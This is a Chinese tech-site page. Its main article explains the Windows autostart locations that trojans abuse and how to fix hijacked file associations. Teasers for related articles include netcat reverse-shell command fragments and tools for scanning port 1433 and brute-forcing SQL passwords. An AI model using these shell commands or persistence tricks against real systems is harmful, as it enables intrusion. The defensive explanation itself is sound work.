隐藏木马启动的几种方法 怎么解决文件关联问题?
木马的最大的特点之一就是它一定是要和系统一起启动而启动,否则它就完全失去了意义!下面为大家介绍一下它的几种隐藏启动的方法:
方法一:注册表启动项:这个大家可能比较熟悉,请大家注意以下的注册表键值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows \CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
这里只要有“run”敏感字眼的都要仔细。
方法二:利用系统文件
可以利用的文件有Win.ini ; system.ini ; Autoexec.bat ; Config.sys. 当系统启动的时候,上述这些文件的一些内容是可以随着系统一起加载的,从而可以被木马利用,用文本方式打开 C:\Windows 下面的system.ini文件 我们会看到,其它的几个所述文件也是经常被用来利用,从而达到开机启动的目的的。
方法三:系统启动组
依次点开“开始”------“程序”------“启动”
WINXP: C:\Documents and Settings\gillispie\[开始]菜单\程序\启动
WIN98: C:\WINDOWS\Start Menu\Programs\启动
对应的注册表键值:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
方法四:利用文件关联:
例如:正常情况下txt文件的打开方式为Notepad.exe文件,如果一旦中了文件关联类的木马,这样打开一个txt文件,原本应该用Notepad打开该文件的,现在却变成了启动木马程序了。
解决文件的关联问题有两种方法:
①修改注册表:
如果木马是关联的EXE文件:
找到键值:
HKEY_CLASSES_ROOT\exefile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command
②进入控制面版,选择文件夹选项-----------文件类型
然后点击"高级" 在弹出的菜单中选择“应用程序”
方法五:利用服务加载
系统要正常的运行,就少不了一些服务,一些木马通过加载服务来达到随系统启动的目的
控制面板--------管理工具------服务
通过 net start 服务名(开启服务)
net stop 服务名(关闭服务)
fckeditor是什么?fckeditor jsp版存在什么漏洞?
FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多WEB项目和
详情2018-01-23 16:59:59责编:llp 来源:驱动管家文件加密器可以快速加密文件 文件加密器怎么使用?
“文件夹加密器”就是一款功能强大的密码加密工具,使用这个软件我们就可以轻松的为重要的文件夹加密了。下面来看看这款软件的使用。一、“文件夹加密器”独特功能如今加密工具曾出不穷,但是用户所追求的操作简
详情2018-01-23 14:45:47责编:llp 来源:驱动管家量子计算是什么?量子计算轻松破解加密算法怎么应对?
量子计算机是一类遵循量子力学规律进行高速数学和逻辑运算、存储及处理量子信息的物理装置。目的主要是为了解决计算机中的能耗问题。听到“量子计算”这个名字,就感觉是电子科技的高端领域。以最直白的方式表达
详情2018-01-29 16:02:02责编:llp 来源:驱动管家百度css import漏洞的基本解析
从我发布百度CSS import漏洞开始,就有人不断问我关于http: hi baidu com edikid 这个空间,到现在可能有上百人了吧!我曾经说过CSS内容原则上是不能被加密的——原因就是它需要被浏览器解析。但是当大家用我
详情2018-02-07 20:01:40责编:llp 来源:驱动管家通过溢出漏洞获得的cmd shell,最大的问题就是如何上传文件
Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。文件传输对于溢出漏洞获得的cmd s
详情2018-02-15 10:12:31责编:llp 来源:驱动管家unix系统怎么使用自带nc工具反弹shell?
NC的原生做法:nc -l -vv -p 2222 -e bin bash无法使用NC反弹的时候可以这样先在tmp创建一个普通管道mknod tmp backpipe p或者mkfifo tmp backpipe p然后管道一边接入shell,一变用NC反弹到攻击者主
详情2018-01-10 10:48:14责编:llp 来源:驱动管家怎么做后台deamon来控制安全访问?这里有个后台脚本
系统为了某些功能必须要提供一些服务(不论是系统本身还是网络方面),这个服务就称为service。而实现这个service的程序我们就称它为daemon。实现某个服务是需要一个daemon在后台中运行,没有这个daemon就不会有s
详情2018-02-02 14:59:08责编:llp 来源:驱动管家黑客入侵有哪些方法?黑客入侵的手段
1 1433端口入侵 scanport exe 查有1433的机器 SQLScanPass exe 进行字典暴破(字典是关键)
详情2018-01-06 16:07:26责编:llp 来源:驱动管家unbelievable!dedecms模板被植入一句话木马
应该是前几天出的那个dedecms的0day 官方的网站被日,然后被在风格模板里面值入了一句话木马。XXOO。
详情2018-01-14 16:04:54责编:llp 来源:驱动管家瑞星杀毒软件怎么用?使用瑞星杀毒软件网络版的注意事项
瑞星杀毒软件网络版可以对网络内的计算机进行统一的安装、设置、管理、维护和升级,从而为企业网络提供完善的病毒防范体系。对于初次接触瑞星杀毒软件网络版的用户来讲,使用经验的缺乏和对产品功能的不熟悉都可
详情2018-01-15 14:04:48责编:llp 来源:驱动管家
- 用ghost版重装系统后找不到显卡 怎么解决
- cad快速看图是什么软件?cad快速看图怎么用?
- 投影镜头是怎样工作的?投影镜头的简介
- 佳能广角镜头有哪些?佳能广角镜头的介绍
- 三星DeX Pad将发布 可当鼠标使用
- 电脑插入u盘之后出现开机蓝屏的原因是什么?怎么解决
- 电脑BIOS是什么意思?BIOS怎么设置
- 小米4s需要哪些贴膜工具?小米4s贴膜流程
- 傲腾内存有哪些性能优势?傲腾内存安装设置详解
- 防止入侵和攻击有哪些技术?访问控制技术有哪些内容?
- win8系统找不到硬件驱动程序 如何解决?
- 电脑装机有哪些软件是必须要下载的?装机必备软件汇总
- 佳能微距镜头好不好?佳能微距镜头相关评测
- 【游戏攻略】绝地求生腰射 肩射与开镜射击弹道对比图
- 电脑打开sli的时候出现蓝屏死机的情况怎么解决
- 怎么判断主板温度过高?电脑主板温度过高怎么办
- 小米手机怎么省电?开启小米省电模式
- MBR分区表能不能转换为GPT分区表?怎么转换
- 字符功能调用类介绍 bios中断目录控制功能描述
- Vista系统下U盘插入后找不到驱动怎么办?